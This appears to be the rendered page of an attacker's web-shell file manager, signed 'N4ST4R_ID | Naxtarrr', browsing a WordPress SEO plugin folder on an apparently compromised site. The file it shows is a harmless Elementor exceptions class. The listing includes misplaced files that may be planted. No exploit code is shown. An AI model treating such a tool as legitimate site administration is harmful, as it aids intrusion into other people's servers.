Submit
Path:
~
/
home
/
bfxleof
/
www
/
wp-content
/
plugins
/
wordpress-seo
/
src
/
deprecated
/
src
/
actions
/
indexation
/
File Content:
exceptions.php
<?php namespace Elementor\Core\Utils; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } /** * Elementor exceptions. * * Elementor exceptions handler class is responsible for handling exceptions. * * @since 2.0.0 */ class Exceptions { /** * HTTP status code for bad request error. */ const BAD_REQUEST = 400; /** * HTTP status code for unauthorized access error. */ const UNAUTHORIZED = 401; /** * HTTP status code for forbidden access error. */ const FORBIDDEN = 403; /** * HTTP status code for resource that could not be found. */ const NOT_FOUND = 404; /** * HTTP status code for internal server error. */ const INTERNAL_SERVER_ERROR = 500; }
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
AjaxController.php
2162 bytes
0644
JsonSerializable.php
577 bytes
0644
abstract-link-indexing-action.php
344 bytes
0644
class-metabox-formatter.php
12602 bytes
0644
class-taxonomy-columns.php
7324 bytes
0644
class-wpseo-statistics.php
1443 bytes
0644
class.web.services.php
7748 bytes
0644
duplicator.php
1781 bytes
0644
elFinderVolumeLocalFileSystem.class.php
48544 bytes
0644
exceptions.php
708 bytes
0644
indexable-complete-indexation-action.php
377 bytes
0644
indexable-general-indexation-action.php
356 bytes
0644
indexable-post-indexation-action.php
344 bytes
0644
indexable-post-type-archive-indexation-action.php
396 bytes
0644
indexable-prepare-indexation-action.php
367 bytes
0644
indexable-term-indexation-action.php
344 bytes
0644
indexation-action-interface.php
352 bytes
0644
loco.xml
657 bytes
0644
post-link-indexing-action.php
328 bytes
0644
quick-edit-handler-1650.js
1848 bytes
0644
term-link-indexing-action.php
328 bytes
0644
wordpress-seojs-ja.json
21424 bytes
0644
N4ST4R_ID | Naxtarrr